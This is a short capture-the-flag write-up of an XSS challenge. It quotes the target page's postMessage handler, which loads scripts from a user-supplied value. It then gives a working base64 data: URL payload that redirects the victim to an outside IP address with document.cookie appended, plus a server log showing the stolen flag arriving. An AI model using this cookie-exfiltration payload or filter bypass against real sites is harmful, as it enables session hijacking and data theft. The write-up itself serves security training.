- Firstly, we had try random url and got 404 with django's debug.
- There was hint: "Using the URLconf defined in XSSWebSite.urls"
- OK. This challenge is about XSS.
- Then we noticed js on main page:
function lls(src) {
var el = document.createElement('script');
if (el) {
el.setAttribute('type', 'text/javascript');
el.src = src;
document.body.appendChild(el);
}
};
function lce(doc, def, parent) {
var el = null;
if (typeof doc.createElementNS != "undefined") el = doc.createElementNS("http://www.w3.org/1999/xhtml", def[0]);
else if (typeof doc.createElement != "undefined") el = doc.createElement(def[0]);
if (!el) return false;
for (var i = 1; i
< def.length; i++) el.setAttribute(def[i++], def[i]);
if (parent) parent.appendChild(el);
return el;
};
window.addEventListener('message', function (e) {
if (e.data.iframe) {
if (e.data.iframe && e.data.iframe.value.indexOf('.') == -1 && e.data.iframe.value.indexOf("//") == -1 && e.data.iframe.value.indexOf("。") == -1 && e.data.iframe.value && typeof(e.data.iframe != 'object')) {
if (e.data.iframe.type == "iframe") {
lce(doc, ['iframe', 'width', '0', 'height', '0', 'src', e.data.iframe.value], parent);
} else {
lls(e.data.iframe.value)
}
}
}
}, false);
window.onload = function (ev) {
postMessage(JSON.parse(decodeURIComponent(location.search.substr(1))), '*')
}
- OK. We can build JSON which spawn script block:
{"iframe":{"value":"data:;base64,ZG9jdW1lbnQubG9jYXRpb24gPSAnaHR0cDovLzUxLjY4LjEyNi4xOTcveHNzLnRlc3Q/Jytkb2N1bWVudC5jb29raWU=","type":123}}
- This payload spawns script block that leaks user's cookies:
<script type="text/javascript" src="data:;base64,ZG9jdW1lbnQubG9jYXRpb24gPSAnaHR0cDovLzUxLjY4LjEyNi4xOTcveHNzLnRlc3Q/Jytkb2N1bWVudC5jb29raWU="></script>
- We've submitted malformed url and got flag to our server:
13.57.104.34 - - [28/Jul/2018:14:25:27 +0200] "GET /xss.test?flag=rwctf%7BL00kI5TheFlo9%7D HTTP/1.1" 404 502 "http://127.0.0.1/?%7B%22iframe%22:%7B%22value%22:%22data:;base64,ZG9jdW1lbnQubG9jYXRpb24gPSAnaHR0cDovLzUxLjY4LjEyNi4xOTcveHNzLnRlc3Q/Jytkb2N1bWVudC5jb29raWU=%22,%22type%22:123%7D%7D" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1"